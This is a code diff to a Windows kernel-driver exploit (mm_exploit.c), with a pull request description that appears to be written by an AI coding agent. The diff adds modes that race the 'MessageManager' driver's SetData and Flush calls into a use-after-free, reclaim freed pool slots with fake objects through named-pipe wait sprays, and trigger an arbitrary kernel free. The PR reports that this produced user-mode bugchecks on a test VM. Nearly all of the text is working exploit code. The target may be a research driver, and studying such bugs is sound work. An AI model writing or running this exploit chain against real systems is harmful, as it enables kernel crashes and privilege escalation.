-     * "survived all Deletes" line would be measuring the spray, not the exploit. Say so instead. */
-    if (parked == 0) {
-        printf("[driftarb] no arb buffer was planted (last error %lu) -- nothing to fire; "
-               "not Deleting, re-run\n", GetLastError());
-        fflush(stdout);
+    if (!arb_buffers_ready("driftarb", (int)parked, (int)total, spray_err)) {
         for (LONG i = 0; i < total; i++) release_pending_pipewait(&pool[i]);
         CloseHandle(start); free(ctx); free(threads); free(pool); free(ids); CloseHandle(dev);
         return 1;

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -1000,7 +1000,22 @@ static uint64_t kernel_rw_anchor(uint64_t kernel_base, HMODULE mapped) {
     return 0;
 }
 
-static int do_rip(int argc, char **argv) {
+/* The pending-FSCTL_PIPE_WAIT reclaim primitive is defined below (near do_reclaimprobe); do_rip's
+ * arbfire path uses it, so declare its type and entry points up here. */
+#define MM_ARB_BUFFER_SENTINEL 0x4242424242424242ull
+typedef struct _PENDING_PIPEWAIT {
+    HANDLE Server;
+    HANDLE Client;
+    HANDLE Root;
+    HANDLE Event;
+    MM_IO_STATUS_BLOCK Iosb;
+    UCHAR *Buf;
+    BOOL Outstanding;
+} PENDING_PIPEWAIT;
+static int spray_pending_pipewait(int index, PENDING_PIPEWAIT *rec, int diag, int arb);
+static void release_pending_pipewait(PENDING_PIPEWAIT *rec);
+
+static int do_rip(int argc, char **argv, int arbfire) {
     int message_count = argc > 2 ? atoi(argv[2]) : 192;
     int spray_count = argc > 3 ? atoi(argv[3]) : 256;
     int delay_base = argc > 4 ? atoi(argv[4]) : 0;
@@ -1318,6 +1333,56 @@ static int do_rip(int argc, char **argv) {
     printf("[rip] %d one-shot races completed %lld driver calls\n",
            completed_rounds, (long long)operations);
 
+    if (arbfire) {
+        /* Debugger-free arbitrary-free, intended chain: the race above frees some target MESSAGEs
+         * while their handle nodes survive (Flush frees the msg but never removes the id->msg node);
+         * reclaim those freed 0x68 slots with arb fake MESSAGEs (RefCount +0x00 == 1, Buffer +0x18
+         * == 0x4242424242424242); then Delete every id, so a stale+reclaimed one calls
+         * ExFreePoolWithTag(0x4242.. ,'Tfub') and bugchecks *from MessageManager* -- the proof.
+         *
+         * MEASURED on 26100.32995 (arbdiag): this does NOT fire. The natural user-mode race here
+         * frees *no* target -- across runs all seeded messages keep valid refcounts (160/160), and
+         * no handle node ever points to an arb-reclaimed chunk (0 of 1090 nodes). So the remaining
+         * debugger dependency is NOT the reclaim (that is natural now -- see do_reclaimprobe/`wait`)
+         * and NOT the arb data plane (natural too -- see `arb`), but the UAF *trigger*: the driver's
+         * refcount race is too tight to win from user mode without the KD orchestration the
+         * walkthrough's SS7 uses to drive one object's count to 0. Landing this needs a stronger
+         * race (per-round reclaim timing, a verifier-widened window) or that KD-driven free -- left
+         * as the open piece. The mode still runs the full chain end to end; `arbdiag` holds before
+         * the trigger so KD can confirm the (empty) stale-handle set. */
+        SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
+        mm_flush(dev, 1);                       /* drain the large list the setter built */
+        int wcount = spray_count * 4;           /* dense reclaim of the freed slots */
+        PENDING_PIPEWAIT *wheld = calloc((size_t)wcount, sizeof(*wheld));
+        if (!wheld) { CloseHandle(dev); free(ids); return 2; }
+        int wok = 0;
+        for (int i = 0; i < wcount; i++)
+            if (spray_pending_pipewait(i, &wheld[i], i == 0, 1)) wok++;
+        printf("[arbfire] %d/%d arb IoSB buffers pending; triggering Delete on %d stale ids "
+               "(Buffer=0x%016llx)\n", wok, wcount, seeded,
+               (unsigned long long)MM_ARB_BUFFER_SENTINEL);
+        if (arbfire == 2) {
+            /* Diagnosis: hold before the trigger so KD can walk the handle list and look for a node
+             * whose msg is an arb chunk (Buffer 0x4242.. at +0x18) -- a stale+reclaimed handle. */
+            printf("[arbdiag] seeded ids %lu..%lu; holding 120s -- walk MessageManager+0x30a0 and "
+                   "look for a node->msg with 4242424242424242 at +0x18.\n",
+                   ids[0], ids[seeded - 1]);
+            fflush(stdout);
+            Sleep(120 * 1000);
+        }
+        fflush(stdout);
+        for (int i = 0; i < seeded; i++)
+            mm_delete(dev, ids[i]);            /* a stale+reclaimed id frees 0x4242.. -> bugcheck */
+        printf("[arbfire] survived all Deletes -- no stale+reclaimed handle fired this run; "
+               "re-run.\n");
+        fflush(stdout);
+        for (int i = 0; i < wcount; i++) release_pending_pipewait(&wheld[i]);
+        free(wheld);
+        free(ids);
+        CloseHandle(dev);
+        return 1;
+    }
+
     /* Only a mismatched large-list node reaches zero here; all racers have returned. Allocate
      * retained, attacker-controlled Tfub candidates before probing the stale target ID. */
     SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
@@ -1508,16 +1573,7 @@ typedef struct _MM_PIPE_WAIT_FOR_BUFFER {
     BOOLEAN TimeoutSpecified;
     WCHAR Name[1];
 } MM_PIPE_WAIT_FOR_BUFFER;
-
-typedef struct _PENDING_PIPEWAIT {
-    HANDLE Server;
-    HANDLE Client;
-    HANDLE Root;
-    HANDLE Event;
-    MM_IO_STATUS_BLOCK Iosb;
-    UCHAR *Buf;
-    BOOL Outstanding;
-} PENDING_PIPEWAIT;
+/* PENDING_PIPEWAIT is declared earlier (before do_rip, which also uses this primitive). */
 
 static void release_pending_pipewait(PENDING_PIPEWAIT *rec) {
     if (!rec) return;
@@ -1553,8 +1609,8 @@ static void release_pending_pipewait(PENDING_PIPEWAIT *rec) {
  * (a case-less CJK-Ext-A unit) satisfies that and yields Buffer == 0x4242424242424242. Uniqueness
  * per (pid, index) comes from name[9..24] (past +0x1f), which Delete's free path never reads --
  * the PID must be there so two concurrent arb processes don't generate the same global pipe leaf
- * and collide in CreateNamedPipeW. */
-#define MM_ARB_BUFFER_SENTINEL 0x4242424242424242ull
+ * and collide in CreateNamedPipeW. MM_ARB_BUFFER_SENTINEL (0x4242424242424242) is defined earlier,
+ * before do_rip. */
 
 static void mm_wait_name(WCHAR out[44], int index, int arb) {
     if (arb) {
@@ -1804,10 +1860,13 @@ int main(int argc, char **argv) {
     if (_stricmp(mode, "trigger") == 0) return do_trigger(argc, argv);
     if (_stricmp(mode, "spray") == 0) return do_spray(argc, argv);
     if (_stricmp(mode, "reclaimprobe") == 0) return do_reclaimprobe(argc, argv);
-    if (_stricmp(mode, "rip") == 0) return do_rip(argc, argv);
+    if (_stricmp(mode, "rip") == 0) return do_rip(argc, argv, 0);
+    if (_stricmp(mode, "arbfire") == 0) return do_rip(argc, argv, 1);
+    if (_stricmp(mode, "arbdiag") == 0) return do_rip(argc, argv, 2);
     printf("usage: %s [leak|demo|hold|fixture [duration-seconds] [messages] [stop-file]|"
            "trigger [duration-seconds]|rip [messages] [retained-tfub-sprays] "
            "[flush-delay-spins] [groom-events]|"
+           "arbfire [messages] [arb-spray-base] [flush-delay-spins] [groom-events]|"
            "reclaimprobe [window-seconds] [spray-count] [hold-seconds] [targets] [wait|arb|afd|pipe]|"
            "spray [pipe|pending|mailslot] [datalen] [count] [start-delay-seconds]]\n",
            argv[0]);

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -1113,6 +1113,26 @@ static void release_pipewait_array(const char *tag, PENDING_PIPEWAIT *recs, LONG
     free(recs);
 }
 
+/*
+ * Seed created messages onto the small list, partitioning the ones that took to the front of
+ * `ids`, and return how many. A failed SetData leaves the message created but bufferless and
+ * unlinked -- not a race participant at all -- so counting it inflates the racer set the
+ * diagnostics report, and at the limit (every seed failing) lets a mode run its reclaim/Delete
+ * phase having raced nothing. Failed ids stay in the array *past* the returned count, so callers
+ * can still Delete the full `made` range on cleanup rather than leaking them in the driver.
+ */
+static int seed_messages_small(HANDLE dev, ULONG *ids, int made) {
+    UCHAR seed[0x40];
+    memset(seed, 0x53, sizeof(seed));
+    int seeded = 0;
+    for (int i = 0; i < made; i++) {
+        if (!mm_setdata(dev, ids[i], seed, sizeof(seed))) continue;   /* RC stays 1, stays unlinked */
+        ULONG t = ids[seeded]; ids[seeded] = ids[i]; ids[i] = t;
+        seeded++;
+    }
+    return seeded;
+}
+
 static int arb_buffers_ready(const char *tag, int parked, int slots, DWORD spray_err) {
     if (parked > 0) return 1;
     printf("[%s] 0/%d arb IoSB buffers parked (last spray error %lu) -- nothing to fire; "
@@ -2083,6 +2103,10 @@ static int do_drift(int argc, char **argv) {
     }
     WORD group = 0;
     if (!validate_rip_cpu_layout(&group)) return 2;
+    /* Allocate the targets from the same CPU's LFH affinity slot the flush/reclaim side draws
+     * from, as `rip` and `reclaimprobe` already do -- targets created on an unpinned coordinator
+     * can land in a slot no pinned worker ever touches. */
+    if (!pin_thread(GetCurrentThread(), MM_CPU_FLUSH_MASK, "drift coordinator to CPU 0")) return 2;
 
     HANDLE dev = open_device();
     if (!dev) {
@@ -2098,12 +2122,16 @@ static int do_drift(int argc, char **argv) {
     for (; made < count; made++)
         if (!mm_create(dev, &ids[made])) break;
     if (made < 1) { printf("[drift] Create failed: %lu\n", GetLastError()); CloseHandle(dev); return 1; }
-    UCHAR seed[0x40];
-    memset(seed, 0x53, sizeof(seed));
-    for (int i = 0; i < made; i++)
-        mm_setdata(dev, ids[i], seed, sizeof(seed));    /* seed each onto the small list (RC=2) */
-    printf("[drift] pid=%lu created+seeded %d messages onto the small list; ids %lu..%lu\n",
-           GetCurrentProcessId(), made, ids[0], ids[made - 1]);
+    int seeded = seed_messages_small(dev, ids, made);
+    if (seeded < 1) {
+        printf("[drift] all %d seed SetData calls failed (%lu) -- nothing on the small list to race\n",
+               made, GetLastError());
+        for (int i = 0; i < made; i++) mm_delete(dev, ids[i]);
+        free(ids); CloseHandle(dev);
+        return 1;
+    }
+    printf("[drift] pid=%lu created %d, seeded %d onto the small list; racing ids %lu..%lu\n",
+           GetCurrentProcessId(), made, seeded, ids[0], ids[seeded - 1]);
 
     /* Threads: `setters` setter(s) cross-moving, one Flush(small), one Flush(large). */
     int nthreads = setters + 2;
@@ -2122,7 +2150,7 @@ static int do_drift(int argc, char **argv) {
     for (int i = 0; i < nthreads; i++) {
         ctx[i].Stop = &stop;
         ctx[i].Ids = ids;
-        ctx[i].Count = made;
+        ctx[i].Count = seeded;      /* only the seeded prefix is on a list and worth racing */
         ctx[i].StartEvent = start;
         ctx[i].Ops = 0;
         ctx[i].Ready = &ready;
@@ -2198,6 +2226,9 @@ static int do_driftfire(int argc, char **argv) {
     }
     WORD group = 0;
     if (!validate_rip_cpu_layout(&group)) return 2;
+    /* Pinned for the whole mode: target creation, the controlled Flush that frees them, and the
+     * reclaim spray all have to draw from the same CPU's LFH affinity slot (see `reclaimprobe`). */
+    if (!pin_thread(GetCurrentThread(), MM_CPU_FLUSH_MASK, "driftfire coordinator to CPU 0")) return 2;
 
     HANDLE dev = open_device();
     if (!dev) { printf("[driftfire] open device failed: %lu\n", GetLastError()); return 1; }
@@ -2210,12 +2241,16 @@ static int do_driftfire(int argc, char **argv) {
     for (; made < count; made++)
         if (!mm_create(dev, &ids[made])) break;
     if (made < 1) { printf("[driftfire] Create failed: %lu\n", GetLastError()); CloseHandle(dev); return 1; }
-    UCHAR seed[0x40];
-    memset(seed, 0x53, sizeof(seed));
-    for (int i = 0; i < made; i++)
-        mm_setdata(dev, ids[i], seed, sizeof(seed));       /* each onto the small list, RC=2 */
-    printf("[driftfire] pid=%lu created+seeded %d messages on small; ids %lu..%lu; %d large-only pass(es)\n",
-           GetCurrentProcessId(), made, ids[0], ids[made - 1], passes);
+    int seeded = seed_messages_small(dev, ids, made);
+    if (seeded < 1) {
+        printf("[driftfire] all %d seed SetData calls failed (%lu) -- nothing to race, so nothing "
+               "could be primed; not firing\n", made, GetLastError());
+        for (int i = 0; i < made; i++) mm_delete(dev, ids[i]);
+        free(ids); CloseHandle(dev);
+        return 1;
+    }
+    printf("[driftfire] pid=%lu created %d, seeded %d on small; racing ids %lu..%lu; %d large-only pass(es)\n",
+           GetCurrentProcessId(), made, seeded, ids[0], ids[seeded - 1], passes);
     fflush(stdout);
 
     /* Safe race: `setters` large-only setters (role 3, bounded passes) race one Flush(small).
@@ -2233,7 +2268,7 @@ static int do_driftfire(int argc, char **argv) {
     int started = 0;
     int pinned = 1;
     for (int i = 0; i < nthreads; i++) {
-        ctx[i].Stop = &stop; ctx[i].Ids = ids; ctx[i].Count = made; ctx[i].StartEvent = start;
+        ctx[i].Stop = &stop; ctx[i].Ids = ids; ctx[i].Count = seeded; ctx[i].StartEvent = start;
         ctx[i].Ready = &ready; ctx[i].Failed = &failed;
         DWORD_PTR mask;
         if (i < setters) { ctx[i].Role = 3; ctx[i].MaxPasses = passes; mask = masks[i % 2]; }
@@ -2278,7 +2313,7 @@ static int do_driftfire(int argc, char **argv) {
 
     if (hold > 0) {
         printf("[driftfire] DIAG hold %d s -- walk seeded ids %lu..%lu: a primed win is RC=1 on the "
-               "large list (msg+0x08 not self-linked)\n", hold, ids[0], ids[made - 1]);
+               "large list (msg+0x08 not self-linked)\n", hold, ids[0], ids[seeded - 1]);
         fflush(stdout);
         Sleep((DWORD)hold * 1000);
     }
@@ -2340,6 +2375,10 @@ static int do_driftarb(int argc, char **argv) {
     }
     WORD group = 0;
     if (!validate_rip_cpu_layout(&group)) return 2;
+    /* The reclaimers run pinned to CPUs 0/2, so the targets must be allocated from one of those
+     * CPUs' LFH affinity slots too -- a target created on an unpinned coordinator can sit in a
+     * slot no reclaimer ever refills, which reads as a failed exploit rather than a missed slot. */
+    if (!pin_thread(GetCurrentThread(), MM_CPU_FLUSH_MASK, "driftarb coordinator to CPU 0")) return 2;
 
     HANDLE dev = open_device();
     if (!dev) { printf("[driftarb] open device failed: %lu\n", GetLastError()); return 1; }
@@ -2352,13 +2391,17 @@ static int do_driftarb(int argc, char **argv) {
     for (; made < count; made++)
         if (!mm_create(dev, &ids[made])) break;
     if (made < 1) { printf("[driftarb] Create failed: %lu\n", GetLastError()); CloseHandle(dev); return 1; }
-    UCHAR seed[0x40];
-    memset(seed, 0x53, sizeof(seed));
-    for (int i = 0; i < made; i++)
-        mm_setdata(dev, ids[i], seed, sizeof(seed));
-    printf("[driftarb] pid=%lu created+seeded %d messages; %d setter(s)+Flush(small)+Flush(large)+"
+    int seeded = seed_messages_small(dev, ids, made);
+    if (seeded < 1) {
+        printf("[driftarb] all %d seed SetData calls failed (%lu) -- nothing to race; not firing\n",
+               made, GetLastError());
+        for (int i = 0; i < made; i++) mm_delete(dev, ids[i]);
+        free(ids); CloseHandle(dev);
+        return 1;
+    }
+    printf("[driftarb] pid=%lu created %d, seeded %d; %d setter(s)+Flush(small)+Flush(large)+"
            "%d reclaimer(s); %dms burst then Delete-trigger; clean fire frees 0x%016llx\n",
-           GetCurrentProcessId(), made, setters, reclaimers, burst_ms,
+           GetCurrentProcessId(), made, seeded, setters, reclaimers, burst_ms,
            (unsigned long long)MM_ARB_BUFFER_SENTINEL);
     fflush(stdout);
 
@@ -2378,7 +2421,7 @@ static int do_driftarb(int argc, char **argv) {
     int started = 0;
     int pinned = 1;
     for (int i = 0; i < nthreads; i++) {
-        ctx[i].Stop = &stop; ctx[i].Ids = ids; ctx[i].Count = made; ctx[i].StartEvent = start;
+        ctx[i].Stop = &stop; ctx[i].Ids = ids; ctx[i].Count = seeded; ctx[i].StartEvent = start;
         ctx[i].Ready = &ready; ctx[i].Failed = &failed;
         ctx[i].Pool = pool; ctx[i].PoolNext = &poolnext; ctx[i].PoolOk = &poolok; ctx[i].PoolCap = cap;
         DWORD_PTR mask;


### PR DESCRIPTION
Builds on the merged reclaim (#100) and arb-free data plane (#101). This lands the piece both left open: **firing the MessageManager UAF trigger from pure user mode — no kernel debugger, no Driver Verifier.**

## What changed
- `examples/messagemanager/mm_exploit.c` — three new modes:
  - **`drift`** — high-volume `SetData` cross-move vs `Flush(small)`+`Flush(large)`. Live on 26100.32995, Verifier off, nothing attached: bugchecks within ~1s at `MessageManager!SetData ExFreePoolWithTag` (`0x13A`), `PROCESS_NAME mm_exploit.exe` — the driver's own arbitrary-free path executing on a use-after-free MESSAGE, driven from user mode (3 independent dumps).
  - **`driftfire`** — safe single large-only pass toward a controlled Delete.
  - **`driftarb`** — continuous race + continuous `0x4242` arb-IoSB reclaim + short burst + controlled Delete, aimed at the clean chosen-target free.
  - Plus: cap `setter-len` at the driver's real `0x2FF4` `Length` limit, and unbuffered stdout so a bugcheck leaves a usable log.
- `docs/messagemanager-walkthrough.md` — new **§8 "Firing the same UAF without a debugger"** (RIP→§9, Streamlining→§10), the instruction-level reverse of the `SetData`/`Flush` missing-inc race, the debugger-free proof loop, and two new gotchas. Passes markdownlint.

## Why the natural race now wins (it didn't before)
Flush holds the list lock across its whole walk, so there's no Flush-vs-Flush double-decrement. The real bug is `SetData`'s cross-move: it unlinks from the source list holding **only the per-message mutex**, and decides inc-vs-no-inc from a **TOCTOU read of the `Linked` flag** (`+0x16d5`). A concurrent Flush in that window leaves the message on a list at refcount one-too-low → the next Flush frees it **with its handle node alive**. The window is a few instructions, so the win is statistical — the lever is **volume** (widening the `memcpy` is void; the driver rejects `Length > 0x2FF4`). Every earlier harness raced one cross-move per message.

## What is still KD-assisted (honestly)
The **clean chosen-target** free (`ExFreePoolWithTag(0x4242)` from Delete) stays debugger-assisted, and the transcript shows *why*: the only source of the stale handle is Flush + the missing-inc, which is inseparable from the **lockless unlink that tears the list** — so the heap corrupts and bugchecks (observed at `+0x1654`, `+0x1668`, `+0x14e9`) before any controlled reclaim→Delete can run. That precise ordering is what a kernel debugger buys. Across ~10 crash/reboot cycles both primitives (arbitrary-free, write-what-where) fired debugger-free, but never the clean sentinel.

The boundary moved from *"reclaim needs KD"* → *"trigger needs KD"* → **"the primitives fire debugger-free; only the clean chosen-target ordering (and the `+0x08` unlink store) remain KD-assisted."**

Verified live on the disposable KDNET VM (26100.32995); the exploit `.exe` is a build artifact and is not checked in.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Added configurable payload sizes, improved race-buffer handling and repeated flush support.
  * Introduced diagnostic modes for race analysis, resource reclaim and arbitrary-free testing.
  * Added pending pipe-wait support and safer worker shutdown.
  * Improved command-line guidance and unbuffered runtime output.

* **Documentation**
  * Expanded the walkthrough with debugger-free procedures, crash evidence, dump classification and troubleshooting guidance.
  * Added deployment checks and operational guidance for race testing and verification.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->